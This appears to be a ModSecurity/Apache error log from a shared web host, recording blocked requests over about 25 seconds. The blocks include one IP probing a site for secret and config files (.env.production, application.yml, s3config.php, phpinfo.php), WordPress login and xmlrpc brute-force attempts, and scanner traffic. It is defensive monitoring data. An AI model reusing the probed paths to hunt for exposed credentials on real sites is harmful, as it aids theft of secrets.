[Tue May 26 18:48:24.875500 2026] [security2:error] [pid 1025417:tid 1025496] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/src/main/resources/application.yml"] [unique_id "ahWdoFHbArxonFeMXvQrBQAAdk4"]
[Tue May 26 18:48:24.913935 2026] [security2:error] [pid 1025417:tid 1025621] [client 146.174.185.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdoFHbArxonFeMXvQq-wAAAEo"]
[Tue May 26 18:48:25.224440 2026] [security2:error] [pid 1025417:tid 1025492] [remote 222.165.190.235:53642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdoVHbArxonFeMXvQrEwAAU0o"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:48:25.301053 2026] [security2:error] [pid 1025417:tid 1025558] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdoFHbArxonFeMXvQrCAAAAAs"]
[Tue May 26 18:48:26.795188 2026] [security2:error] [pid 1025417:tid 1025493] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/src/main/resources/application-prod.yml"] [unique_id "ahWdolHbArxonFeMXvQrPQAABks"]
[Tue May 26 18:48:26.941824 2026] [security2:error] [pid 1025417:tid 1025503] [remote 72.167.150.128:50304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdolHbArxonFeMXvQrPgAATlU"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:48:27.904813 2026] [security2:error] [pid 1025417:tid 1025602] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdo1HbArxonFeMXvQrUgAAADc"]
[Tue May 26 18:48:28.240926 2026] [security2:error] [pid 1025417:tid 1025505] [remote 216.73.216.30:42770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdpFHbArxonFeMXvQrXwAAMVc"]
[Tue May 26 18:48:28.317387 2026] [security2:error] [pid 1025417:tid 1025507] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdpFHbArxonFeMXvQraAAAHFk"]
[Tue May 26 18:48:28.317537 2026] [security2:error] [pid 1025417:tid 1025575] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdpFHbArxonFeMXvQraAAAHFk"]
[Tue May 26 18:48:28.716163 2026] [security2:error] [pid 1025417:tid 1025513] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/app/Services/s3config.php"] [unique_id "ahWdpFHbArxonFeMXvQrcwAAH18"]
[Tue May 26 18:48:28.862293 2026] [security2:error] [pid 1025417:tid 1025598] [client 162.243.41.33:63643] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWdpFHbArxonFeMXvQrfAAAADM"]
[Tue May 26 18:48:29.428811 2026] [security2:error] [pid 1025417:tid 1025586] [client 66.249.64.2:40672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdpVHbArxonFeMXvQrgQAAACc"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:29.435725 2026] [security2:error] [pid 1025417:tid 1025519] [remote 173.212.245.56:49896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdpVHbArxonFeMXvQrgAAAbGU"]
[Tue May 26 18:48:29.689707 2026] [security2:error] [pid 1025417:tid 1025500] [remote 173.212.245.56:49896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdpVHbArxonFeMXvQrigAASlI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:48:29.858183 2026] [security2:error] [pid 1025417:tid 1025576] [client 66.249.64.2:40672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdpVHbArxonFeMXvQriwAAAB0"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:30.090469 2026] [security2:error] [pid 1025417:tid 1025551] [client 66.249.64.3:36296] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdpVHbArxonFeMXvQrlQAAAAQ"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:30.243599 2026] [security2:error] [pid 1025417:tid 1025619] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdpVHbArxonFeMXvQrjwAAAEg"]
[Tue May 26 18:48:30.272691 2026] [security2:error] [pid 1025417:tid 1025644] [client 66.249.64.1:45261] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdplHbArxonFeMXvQrmgAAAGE"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:30.337296 2026] [security2:error] [pid 1025417:tid 1025624] [client 66.249.64.1:56653] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdplHbArxonFeMXvQrmwAAAE0"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:30.584083 2026] [security2:error] [pid 1025417:tid 1025633] [client 66.249.64.2:40672] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdplHbArxonFeMXvQrogAAAFY"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:30.621849 2026] [security2:error] [pid 1025417:tid 1025522] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/app/config.php"] [unique_id "ahWdplHbArxonFeMXvQrpgAAWmg"]
[Tue May 26 18:48:30.894208 2026] [security2:error] [pid 1025417:tid 1025569] [client 66.249.64.1:56653] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdplHbArxonFeMXvQrpwAAABY"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:30.913135 2026] [security2:error] [pid 1025417:tid 1025659] [client 66.249.64.2:56408] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdplHbArxonFeMXvQrqAAAAHA"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:31.535118 2026] [security2:error] [pid 1025417:tid 1025613] [client 66.249.64.1:56653] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdp1HbArxonFeMXvQrvAAAAEI"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:32.156767 2026] [security2:error] [pid 1025417:tid 1025534] [remote 211.23.68.235:38516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWdp1HbArxonFeMXvQrzgAAE3Q"]
[Tue May 26 18:48:32.191814 2026] [security2:error] [pid 1025417:tid 1025556] [client 66.249.64.3:36296] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdp1HbArxonFeMXvQrzQAAAAk"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:32.241756 2026] [security2:error] [pid 1025417:tid 1025618] [client 66.249.64.2:56408] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdqFHbArxonFeMXvQrzwAAAEc"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:32.447028 2026] [security2:error] [pid 1025417:tid 1025610] [client 66.249.64.3:53661] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahWdqFHbArxonFeMXvQr0gAAAD8"], referer: https://www.yourstorybag.com/talking-data-the-storied-way/
[Tue May 26 18:48:32.751606 2026] [security2:error] [pid 1025417:tid 1025670] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdqFHbArxonFeMXvQr2AAAAHs"]
[Tue May 26 18:48:33.064216 2026] [security2:error] [pid 1025417:tid 1025531] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/server/helper.js"] [unique_id "ahWdqVHbArxonFeMXvQr7gAAOXE"]
[Tue May 26 18:48:33.503367 2026] [security2:error] [pid 1025417:tid 1025424] [remote 5.42.158.148:37760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdqVHbArxonFeMXvQr9gAAdgY"]
[Tue May 26 18:48:35.117180 2026] [security2:error] [pid 1025417:tid 1025579] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdqlHbArxonFeMXvQsHAAAACA"]
[Tue May 26 18:48:35.122001 2026] [security2:error] [pid 1025417:tid 1025427] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/helper.js"] [unique_id "ahWdq1HbArxonFeMXvQsJQAAaQk"]
[Tue May 26 18:48:35.904244 2026] [security2:error] [pid 1025417:tid 1025545] [remote 141.95.202.18:55560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdq1HbArxonFeMXvQsNAAAIn8"]
[Tue May 26 18:48:36.163116 2026] [security2:error] [pid 1025417:tid 1025436] [remote 141.95.202.18:55560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdrFHbArxonFeMXvQsPQAAeBI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:48:37.021988 2026] [security2:error] [pid 1025417:tid 1025438] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/settings.py"] [unique_id "ahWdrVHbArxonFeMXvQsUQAATxQ"]
[Tue May 26 18:48:37.534467 2026] [security2:error] [pid 1025417:tid 1025606] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdrVHbArxonFeMXvQsVAAAADs"]
[Tue May 26 18:48:38.230230 2026] [security2:error] [pid 1025417:tid 1025444] [remote 5.42.158.148:37760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdrlHbArxonFeMXvQsawAAMBo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:48:38.553232 2026] [security2:error] [pid 1025417:tid 1025446] [remote 216.73.216.30:27866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWdrlHbArxonFeMXvQsdQAAWxw"]
[Tue May 26 18:48:38.942524 2026] [security2:error] [pid 1025417:tid 1025445] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/php/phpinfo.php"] [unique_id "ahWdrlHbArxonFeMXvQsfAAAcxs"]
[Tue May 26 18:48:39.332455 2026] [security2:error] [pid 1025417:tid 1025450] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdr1HbArxonFeMXvQsgAAAVSA"]
[Tue May 26 18:48:39.332655 2026] [security2:error] [pid 1025417:tid 1025632] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWdr1HbArxonFeMXvQsgAAAVSA"]
[Tue May 26 18:48:39.646716 2026] [security2:error] [pid 1025417:tid 1025443] [remote 162.214.121.181:44320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.121.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdr1HbArxonFeMXvQsiwAASRk"]
[Tue May 26 18:48:40.083463 2026] [security2:error] [pid 1025417:tid 1025562] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdr1HbArxonFeMXvQskQAAAA8"]
[Tue May 26 18:48:40.554066 2026] [security2:error] [pid 1025417:tid 1025447] [remote 162.214.121.181:44320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 181.121.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdsFHbArxonFeMXvQsqAAADR0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:48:41.202531 2026] [security2:error] [pid 1025417:tid 1025454] [remote 162.241.152.21:51888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdsVHbArxonFeMXvQsugAAGSQ"]
[Tue May 26 18:48:41.408347 2026] [security2:error] [pid 1025417:tid 1025456] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/php_info.php"] [unique_id "ahWdsVHbArxonFeMXvQsxwAAayY"]
[Tue May 26 18:48:41.841528 2026] [security2:error] [pid 1025417:tid 1025464] [remote 51.91.98.45:59748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdsVHbArxonFeMXvQszAAACy4"]
[Tue May 26 18:48:42.062538 2026] [security2:error] [pid 1025417:tid 1025468] [remote 162.241.152.21:51888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.152.241.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdsVHbArxonFeMXvQs2QAAAjI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:48:42.257921 2026] [security2:error] [pid 1025417:tid 1025470] [remote 51.91.98.45:59748] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdslHbArxonFeMXvQs4AAADTQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:48:42.690618 2026] [security2:error] [pid 1025417:tid 1025670] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdslHbArxonFeMXvQs5gAAAHs"]
[Tue May 26 18:48:42.932331 2026] [autoindex:error] [pid 1025417:tid 1025585] [client 49.34.217.137:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/gallery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/gallery
[Tue May 26 18:48:43.255678 2026] [security2:error] [pid 1025417:tid 1025481] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/information"] [unique_id "ahWds1HbArxonFeMXvQtEwAAYT8"]
[Tue May 26 18:48:43.820318 2026] [security2:error] [pid 1025417:tid 1025460] [remote 216.73.216.30:3029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWds1HbArxonFeMXvQtKQAAPio"]
[Tue May 26 18:48:45.088457 2026] [security2:error] [pid 1025417:tid 1025498] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/system/config.php"] [unique_id "ahWdtVHbArxonFeMXvQtRgAAEFA"]
[Tue May 26 18:48:45.171432 2026] [security2:error] [pid 1025417:tid 1025643] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdtFHbArxonFeMXvQtPwAAAGA"]
[Tue May 26 18:48:47.051871 2026] [security2:error] [pid 1025417:tid 1025499] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/.env.production"] [unique_id "ahWdt1HbArxonFeMXvQtdwAAcFE"]
[Tue May 26 18:48:47.616749 2026] [security2:error] [pid 1025417:tid 1025594] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdt1HbArxonFeMXvQtgwAAAC8"]
[Tue May 26 18:48:48.561861 2026] [security2:error] [pid 1025417:tid 1025509] [remote 216.73.216.30:3029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWduFHbArxonFeMXvQtpwAAf1s"]
[Tue May 26 18:48:48.991998 2026] [security2:error] [pid 1025417:tid 1025585] [client 146.174.165.177:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWduFHbArxonFeMXvQtpgAAACY"]
[Tue May 26 18:48:49.022458 2026] [security2:error] [pid 1025417:tid 1025510] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/.env.development"] [unique_id "ahWduVHbArxonFeMXvQtrgAAelw"]
[Tue May 26 18:48:49.754489 2026] [security2:error] [pid 1025417:tid 1025519] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWduVHbArxonFeMXvQtxQAAVWU"]
